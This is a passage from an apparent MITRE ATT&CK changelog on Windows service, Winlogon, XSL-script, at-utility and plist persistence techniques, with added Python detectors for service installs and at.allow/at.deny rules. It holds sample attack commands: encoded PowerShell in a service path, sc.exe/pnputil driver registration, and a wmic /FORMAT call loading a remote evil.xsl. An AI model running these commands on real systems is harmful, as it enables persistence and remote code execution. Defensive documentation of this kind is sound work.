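        # A driver registered through a service should load from System32\drivers.
        if DRIVER_DIR not in path:
            reasons.append("kernel driver image outside System32\\drivers")
    elif any(h in path for h in SCRIPT_HOSTS):
        reasons.append("service binary is a script/command host")
    if any(w in path for w in USER_WRITABLE):
        reasons.append("image in user-writable location")
    expected = EXPECTED_IMAGE.get(name)
    if expected and expected not in path:
        reasons.append("well-known service name with unexpected image path")
    return reasons


def review_command(cmd: str) -> List[str]:
    """Flag command lines that create or reconfigure services, or install drivers."""
    low = cmd.lower().strip()
    if not low:
        return []
    exe = low.split()[0].rsplit("\\", 1)[-1]
    # sc.exe create/config ... binPath= <image>: the documented way to register a service.
    if exe in ("sc", "sc.exe") and (" create " in low or " config " in low) and "binpath=" in low:
        return ["sc.exe create/config with binPath"]
    # pnputil /add-driver <inf> [/install]: driver staging and installation from the CLI.
    if exe == "pnputil.exe" and "/add-driver" in low:
        return ["pnputil driver install"]
    return []


# Constructed service-install records and command lines.
SAMPLE_7045 = [
    {"ServiceName": "wuauserv", "ImagePath": r"%SystemRoot%\system32\svchost.exe -k netsvcs -p",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "UpdateHelper", "ImagePath": r"C:\Users\Public\helper.exe",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "netfilt", "ImagePath": r"\??\C:\ProgramData\netfilt.sys",
     "ServiceType": "kernel mode driver", "StartType": "demand start", "AccountName": ""},
    {"ServiceName": "Spooler", "ImagePath": r"C:\Windows\Temp\spoolsv.exe",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Telemetry", "ImagePath": r"%SystemRoot%\System32\cmd.exe /c powershell -enc QQBBAEEA",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
]
SAMPLE_COMMANDS = [
    r'sc.exe create netfilt type= kernel binPath= "C:\ProgramData\netfilt.sys"',
    r"pnputil.exe /add-driver C:\Users\Public\netfilt.inf /install",
    r"sc.exe query spooler",
]

if __name__ == "__main__":
    for ev in SAMPLE_7045:
        print(ev["ServiceName"], review_service_install(ev))
    for cmd in SAMPLE_COMMANDS:
        print(cmd, review_command(cmd))
```

Path checks catch the drop-and-register pattern but not the signed-vulnerable-driver (BYOVD) case, where the image may sit in the expected folder; that needs a hash or signer denylist compared against the loaded image, which this example deliberately does not invent.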
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018. | |
| external_references | Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020. | |
| external_references | Microsoft. (n.d.). Services. Retrieved June 7, 2016. | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-478 | |
| external_references | CAPEC-550 | |
| external_references | CAPEC-551 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-16 15:49:58.490000+00:00 | 2022-06-30 20:17:33.824000+00:00 |
| description | Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system. An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). | Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. 
Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). |
| external_references[1]['source_name'] | capec | Microsoft Windows Event Forwarding FEB 2018 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/478.html | https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection |
| external_references[2]['source_name'] | capec | ESET InvisiMole June 2020 |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/550.html | https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf |
| external_references[3]['source_name'] | capec | TechNet Services |
| external_references[3]['url'] | https://capec.mitre.org/data/definitions/551.html | https://technet.microsoft.com/en-us/library/cc772408.aspx |
| external_references[4]['source_name'] | TechNet Services | Microsoft 4697 APR 2017 |
| external_references[4]['description'] | Microsoft. (n.d.). Services. Retrieved June 7, 2016. | Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018. |
| external_references[4]['url'] | https://technet.microsoft.com/en-us/library/cc772408.aspx | https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 |
| external_references[5]['source_name'] | TechNet Autoruns | Symantec W.32 Stuxnet Dossier |
| external_references[5]['description'] | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020. |
| external_references[5]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf |
| external_references[6]['source_name'] | Microsoft 4697 APR 2017 | Unit42 AcidBox June 2020 |
| external_references[6]['description'] | Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018. | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. |
| external_references[6]['url'] | https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ |
| external_references[7]['source_name'] | Microsoft Windows Event Forwarding FEB 2018 | TechNet Autoruns |
| external_references[7]['description'] | Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[7]['url'] | https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
| x_mitre_contributors[1] | Travis Smith, Tripwire | Pedro Harrison |
| x_mitre_contributors[2] | Pedro Harrison | Mayuresh Dani, Qualys |
| x_mitre_data_sources[0] | Service: Service Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[3] | Process: Process Creation | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[6] | Windows Registry: Windows Registry Key Creation | Process: Process Creation |
| x_mitre_data_sources[7] | Windows Registry: Windows Registry Key Modification | Service: Service Creation |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Crowdstrike DriveSlayer February 2022', 'description': 'Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.', 'url': 'https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/478.html', 'external_id': 'CAPEC-478'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/550.html', 'external_id': 'CAPEC-550'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/551.html', 'external_id': 'CAPEC-551'} | |
| x_mitre_contributors | Wietze Beukema, @wietze | |
| x_mitre_contributors | Akshat Pradhan, Qualys | |
| x_mitre_data_sources | Driver: Driver Load | |
| Old Description | New Description |
|---|---|
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013) * Winlogon\Notify - points to notification package DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence. |
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | |
| external_references | CAPEC-579 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-579 | |
| external_references | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-04-21 16:00:41.277000+00:00 | 2022-04-20 16:32:14.691000+00:00 |
| description | Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence. |
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence. |
| external_references[1]['source_name'] | capec | Cylance Reg Persistence Sept 2013 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/579.html | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order |
| external_references[2]['source_name'] | Cylance Reg Persistence Sept 2013 | TechNet Autoruns |
| external_references[2]['description'] | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[2]['url'] | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
| external_references[3]['source_name'] | TechNet Autoruns | capec |
| external_references[3]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://capec.mitre.org/data/definitions/579.html |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Windows Registry: Windows Registry Key Modification |
| Description |
|---|
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft command line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* msxsl.exe customers[.]xml script[.]xsl
* msxsl.exe script[.]xsl script[.]xsl
* msxsl.exe script[.]jpeg script[.]jpeg
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl” |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 15:07:00.842000+00:00 | 2022-05-05 05:04:14.238000+00:00 |
| external_references[1]['source_name'] | Microsoft XSLT Script Mar 2017 | Reaqta MSXSL Spearphishing MAR 2018 |
| external_references[1]['description'] | Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using `<msxsl:script>`. | Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018. |
| external_references[1]['url'] | https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script | https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/ |
| external_references[2]['source_name'] | Microsoft msxsl.exe | Twitter SquiblyTwo Detection APR 2018 |
| external_references[2]['description'] | Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018. | Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018. |
| external_references[2]['url'] | https://www.microsoft.com/download/details.aspx?id=21714 | https://twitter.com/dez_/status/986614411711442944 |
| external_references[3]['source_name'] | Penetration Testing Lab MSXSL July 2017 | LOLBAS Wmic |
| external_references[3]['description'] | netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018. | LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019. |
| external_references[3]['url'] | https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/ | https://lolbas-project.github.io/lolbas/Binaries/Wmic/ |
| external_references[4]['source_name'] | Reaqta MSXSL Spearphishing MAR 2018 | Microsoft msxsl.exe |
| external_references[4]['description'] | Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018. | Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018. |
| external_references[4]['url'] | https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/ | https://www.microsoft.com/download/details.aspx?id=21714 |
| external_references[5]['source_name'] | XSL Bypass Mar 2019 | Penetration Testing Lab MSXSL July 2017 |
| external_references[5]['description'] | Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019. | netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018. |
| external_references[5]['url'] | https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75 | https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/ |
| external_references[6]['source_name'] | LOLBAS Wmic | XSL Bypass Mar 2019 |
| external_references[6]['description'] | LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019. | Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019. |
| external_references[6]['url'] | https://lolbas-project.github.io/lolbas/Binaries/Wmic/ | https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75 |
| external_references[7]['source_name'] | Twitter SquiblyTwo Detection APR 2018 | Microsoft XSLT Script Mar 2017 |
| external_references[7]['description'] | Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018. | Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using `<msxsl:script>`. |
| external_references[7]['url'] | https://twitter.com/dez_/status/986614411711442944 | https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script |
| x_mitre_defense_bypassed[1] | Application control | Digital Certificate Validation |
| x_mitre_defense_bypassed[2] | Digital Certificate Validation | Application Control |
| Description |
|---|
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)
An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account.
Adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at) |
| Description for T1053.002 At |
|---|
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at) |
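The at.allow / at.deny precedence described in the T1053.002 text above, written out as an audit helper a defender can run against a host's configuration. This is an added example, not ATT&CK content or code from the at utility; it assumes the superuser account is named root and that the two files hold one username per line.

```python
"""Evaluate who may invoke at(1) under the at.allow / at.deny rules
described for T1053.002. Added example; not part of ATT&CK or of at itself."""
from pathlib import Path
from typing import Dict, Iterable, Optional, Set

SUPERUSER = "root"  # assumption: the superuser account is called root


def parse_access_file(path: Path) -> Optional[Set[str]]:
    """Return the usernames listed in an at.allow / at.deny style file,
    or None when the file does not exist (absence changes the policy)."""
    if not path.exists():
        return None
    users: Set[str] = set()
    for line in path.read_text().splitlines():
        line = line.strip()
        if line and not line.startswith("#"):  # assumption: '#' comments are ignored
            users.add(line)
    return users


def at_permitted(user: str, allow: Optional[Set[str]], deny: Optional[Set[str]]) -> bool:
    """Apply the precedence from the technique description:
    1. the superuser may always invoke at;
    2. if at.allow exists, only the users it lists may;
    3. otherwise, if at.deny exists, every user not listed may
       (so an empty at.deny permits global use);
    4. if neither file exists, only the superuser may."""
    if user == SUPERUSER:
        return True
    if allow is not None:
        return user in allow
    if deny is not None:
        return user not in deny
    return False


def audit_at_access(users: Iterable[str], etc_dir: Path) -> Dict[str, bool]:
    """Report, for each account of interest, whether it can schedule at jobs
    on a host whose at.allow / at.deny live in etc_dir."""
    allow = parse_access_file(etc_dir / "at.allow")
    deny = parse_access_file(etc_dir / "at.deny")
    return {u: at_permitted(u, allow, deny) for u in users}


if __name__ == "__main__":
    import tempfile

    # Constructed scenario: an empty at.deny and no at.allow, which silently
    # opens at to every local account, including service users.
    with tempfile.TemporaryDirectory() as tmp:
        etc = Path(tmp)
        (etc / "at.deny").write_text("")
        print(audit_at_access(["root", "alice", "www-data"], etc))
```

Accounts reported as permitted that have no business scheduling jobs (service users, for instance) are the ones whose at jobs deserve a closer look in the Scheduled Job data source.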
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | ['Scheduled Job: Scheduled Job Creation', 'Command: Command Execution', 'Process: Process Creation'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:36:26.063000+00:00 | 2022-04-16 20:45:01.814000+00:00 |
| revoked | False | True |
| external_references[1]['source_name'] | Kifarunix - Task Scheduling in Linux | rowland linux at 2019 |
| external_references[1]['description'] | Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019. | Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021. |
| external_references[1]['url'] | https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ | https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/ |
| external_references[3]['source_name'] | rowland linux at 2019 | Kifarunix - Task Scheduling in Linux |
| external_references[3]['description'] | Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021. | Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019. |
| external_references[3]['url'] | https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/ | https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ |
| Description |
|---|
Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description)
Adversaries can modify paths to executed binaries, add command line arguments, and insert key/value pairs into plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1) |
| Description for T1647 Plist File Modification |
|---|
Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description)
Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).
For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application’s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | ['Service: Service Creation', 'Command: Command Execution', 'File: File Modification', 'Process: Process Creation'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:46:47.383000+00:00 | 2022-04-20 21:06:07.560000+00:00 |
| revoked | False | True |
| Description |
|---|
